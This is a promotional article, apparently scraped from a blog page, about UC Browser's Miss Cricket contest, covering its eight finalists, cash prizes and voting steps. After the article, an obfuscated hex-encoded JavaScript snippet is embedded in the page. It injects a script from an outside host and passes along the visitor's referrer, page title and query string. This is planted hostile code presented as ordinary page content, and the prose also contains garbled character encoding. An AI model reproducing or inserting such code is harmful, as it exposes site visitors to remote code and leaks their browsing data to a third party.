UC Browsera�� Miss Cricket Contest Enters Final Round; Top 8 Contestants Vie for Cash prize of Rs 10 lakh

The UC Miss Cricket Contest, an exciting campaign from UC Browser, Indiaa��s leading mobile browser, has entered its final round with top 8 candidates. The campaign is in line with UC Browser’s strategy to provide richer content to users and add fun to its content by addingA�interactive elements to its cricket coverage. UC Browser users have voted to shortlist these 8 candidates based on the different tasks they have done in last round.A� The top 8 candidates include popular actor Urvashi Rautela, along with Pari Sharma, Megha Prasad, Pooja Soni, Aishwarya Singh, ArpitaDighe, StutiSahu and Nishi Singh.

UC Browser users get a chance to vote for their top pick through UC Browser app which has an in-app tool of cricket content aggregation offering all-in-one live cricket content. UC Browser will reward the most-voted contestant with Rs 10 lakh cash prize as well as a chance to act in a UCWeb commercial. The first and second runner-up will get Rs 5 lakh and Rs 2 lakh respectively.

Miss Diva and well-known Bollywood actress Urvashi Rautela was one of the most popular Miss Cricket contestants during this campaign. In the last round, her video in a beautiful red saree, supporting Mumbai Indians and blowing a kiss to her fans became popular and went viral on UC Browser. A�The Interneta��s A-Lister, social media influencer Aishwarya Singhand a sweet and cute TV beauty Nishi Singh were also among the top picks competing with Urvashi.A� Aishwarya Singh interacted with her fans through her dynamic singing and acting skills while Nishi Singh attracted fans with her energetic cheerleading performance. All the votes will be cleared in the next round and their fans will have to vote again in the final stage to support contestants to be the final winner.

Support and Engage with UC Miss Cricket Contest

Step 1: From 7th May to 17th May, users will have to choose a daily mission out of 3 options for their candidates to complete during this period. The options available for users to choose include: Wear a cricket uniform in a cute way; Shoot a Super funny Talk show about IPL etc. Videos of their performance will be uploaded on UC Browser.

Step 2: UC Browser users to vote for their favourite videos. Voting process to get over byA�May 18. The top 3 participants will be chosen based on the votes their videos get

Usersa�� reward: If you choose a mission that is also the most popular, you get to share the bonus equally with other users. Total prize money of over Rupees 5 lakh to be won as Paytm cash.

var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

Leave a Reply

Your email address will not be published. Required fields are marked *